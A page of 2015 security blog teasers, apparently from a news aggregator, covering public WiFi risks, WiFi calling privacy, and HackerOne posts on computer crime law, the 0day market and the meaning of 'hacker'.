    In fewer than 10 years, smartphones have revolutionized how we interact with the world and with each other. Carrying a powerful computer in your pocket has countless advantages, but what about the risks? Mobile innovation is moving so fast, driven by a voracious market, that many consumers are jumping to adopt new technologies without stopping to consider the potential risks to their data privacy. One of the latest such developments is WiFi phone calling capability. Here are some things to consider before embracing this relatively new possibility. What is WiFi Calling? Simply stated, WiFi…
  • Do’s and Don’t at a Public WiFi

    Robert Siciliano
    19 May 2015 | 8:56 am
    Public WiFi is the location where you can get online: airport, airplane, coffee house, hotel, motel and more. Many people don’t give this a second thought, unaware of how risky this really is. Public WiFi is very non-secure, a goldmine for hackers who want to steal your identity and commit fraud, destroy your website, you name it. They can do this many ways, including intercepting your activity with an imposter website where you input login details—that the hacker then obtains. But public WiFi will always be risky as long as its proprietors, such as the coffee house, find that enabling…

    HackerOne News & Security Blog

  • Legally Blind and Deaf - How Computer Crime Laws Silence Helpful Hackers

    19 May 2015 | 5:00 pm
    A worldwide war is being waged in which the most able-bodied soldiers are being discouraged from enlisting. It is an information security war, and hackers are the troops and the weapon designers that have the skills to shape our collective future, for good or for ill.
  • The Wolves of Vuln Street - The First System Dynamics Model of the 0day Market

    13 Apr 2015 | 5:00 pm
    HackerOne has been working with economics and policy researchers from MIT and Harvard to study the economic forces behind the 0day market. Here's what they found.
  • Meet The Newest Member of the HackerOne Team: Stepto, Director of Hacker Success

    6 Apr 2015 | 5:00 pm
    At HackerOne we believe in the power of the research community as an effective way to harden any attack surface. Encouraging, promoting and protecting security research has been integral to our mission since day one. As a key next step in fulfilling this commitment, we are thrilled to announce that Stepto has joined the HackerOne team as the Director of Hacker Success.
  • What's in a Name?

    25 Feb 2015 | 4:00 pm
    While there are many interpretations of the word "hacker," we choose to pay homage to the original MIT hackers by using the term in our company name. We favor their early definition of a hacker: "one who enjoys the intellectual challenge of creatively overcoming limitations."
  • Proposed Changes to the Computer Fraud and Abuse Act, Austin Powers, and You

    15 Jan 2015 | 4:00 pm
    Many security professionals, hackers, lawyers, law enforcement officials, and members of the media are keenly interested in the White House's proposed changes to laws affecting Internet security. Among the proposed amendments to the Computer Fraud and Abuse Act (CFAA), the biggest concerns center on expanded language that poses an increased risk to many vulnerability research and security testing activities, and even to reporting on breaches.